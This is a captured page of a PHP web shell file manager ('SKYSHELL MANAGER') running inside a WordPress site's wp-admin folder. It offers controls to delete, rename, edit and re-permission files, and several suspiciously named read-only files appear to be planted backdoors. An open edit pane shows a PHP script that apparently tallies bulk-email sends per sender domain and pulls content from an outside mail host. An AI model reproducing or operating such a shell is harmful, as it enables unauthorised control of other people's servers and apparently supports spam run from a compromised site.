📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: fromdom.php
<?php include_once "connect.php"; $key=$_REQUEST['key']; if(empty($key)) {$key=0;} if($key==4) { $temp=explode('.',$local_server); $temp=explode('//',$temp[0]); echo file_get_contents("http://1and1-1.webxmail.us/generate_fromdom_csv.php?key=1&alias=$temp[1]"); exit; } if($key==3 || $key==0) { $temp=explode('.',$local_server); $temp=explode('//',$temp[0]); echo file_get_contents("http://1and1-1.webxmail.us/fromdom.php?alias=$temp[1]"); } if($key==1 || $key==0) { echo " <td width='30%' valign='top'> <div id='snt_ct_res' class='box box-color box-bordered'> <div class='box-title'> <h3> <i class='icon-table'></i> Sent Count by Date/ PID /Domain </h3> <h3 style='float:right;cursor:pointer;font-size:15px;'> <span onclick='generate_csv1(4);' title='Click to generate csv file' >Generate csv</span> <span id='csv_resp_4' style='margin-left:5px;color:white;font-size:15px;'></span> <i class='glyphicon-refresh' onclick='refFun(\"1\",\"snt_ct_res\");'></i> </h3> </div> <div class='box-content nopadding'><table class='table table-hover table-nomargin table-striped'> <thead> <tr> <th >#</th> <th >Date</th> <th >PID </th> <th >From Domain</th> <th >Sent </th> </tr> </thead> <tbody>"; $i=1; $res=mysql_query("SELECT date(s_date),process_id,from_domain,sum(sent) from md_fromdomain group by 1,2,3 order by 2 desc, 4 desc limit 100",$link1); while($row=mysql_fetch_array($res)){ echo "<tr><td>$i</td><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td></tr>"; $i++; } echo "</table></div></div> </td> "; } if($key==2 || $key==0) { echo " <td width='20%' valign='top'> <div id='snt_ctd_res' class='box box-color box-bordered'> <div class='box-title'> <h3> <i class='icon-table'></i> Sent Count by Domain </h3> <h3 style='float:right;cursor:pointer;font-size:15px;'> <span onclick='generate_csv1(5);' title='Click to generate csv file' >Generate csv</span> <span id='csv_resp_5' style='margin-left:5px;color:white;font-size:15px;'></span> <i class='glyphicon-refresh' onclick='refFun(\"2\",\"snt_ctd_res\");'></i> </h3> </div> <div class='box-content nopadding'> <table class='table table-hover table-nomargin table-striped' > <thead> <tr> <th >#</th> <th >From Domain</th> <th >Sent </th> </tr> </thead> <tbody>"; $i=1; $res=mysql_query("SELECT distinct from_domain, sum(sent) from md_fromdomain group by 1 order by 2 desc limit 100",$link1); while($row=mysql_fetch_array($res)){ echo "<tr> <td>$i</td> <td>$row[0]</td> <td>$row[1]</td> </tr>"; $i++; } echo "</table> </div> </div> </td> "; } ?> <script> var shpath='<?php echo "$local_server/";?>'; function refFun(key,res) { $('#'+res).html("<a class='btn btn-blue btn-mini' href='#' ><i class='icon-refresh icon-spin'></i> Processing... </a>"); $.post( shpath+"/fromdom.php", { key: key }, function(data) { $('#'+res).html(data); } ); } function generate_csv1(flag) { $('#csv_resp_'+flag).html("<a class='btn btn-blue btn-mini' href='#' ><i class='icon-refresh icon-spin'></i></a>"); $.post("list_id.php", { key: 4 ,flag:flag }, function(data) { $('#csv_resp_'+flag).html(data); } ); } function generate_csvFile(alias) { $('#csv_resp_6').html("<a class='btn btn-blue btn-mini' href='#' ><i class='icon-refresh icon-spin'></i></a>"); $.post("fromdom.php", { key: 4 ,alias:alias }, function(data) { $('#csv_resp_6').html(data); } ); } </script>
Save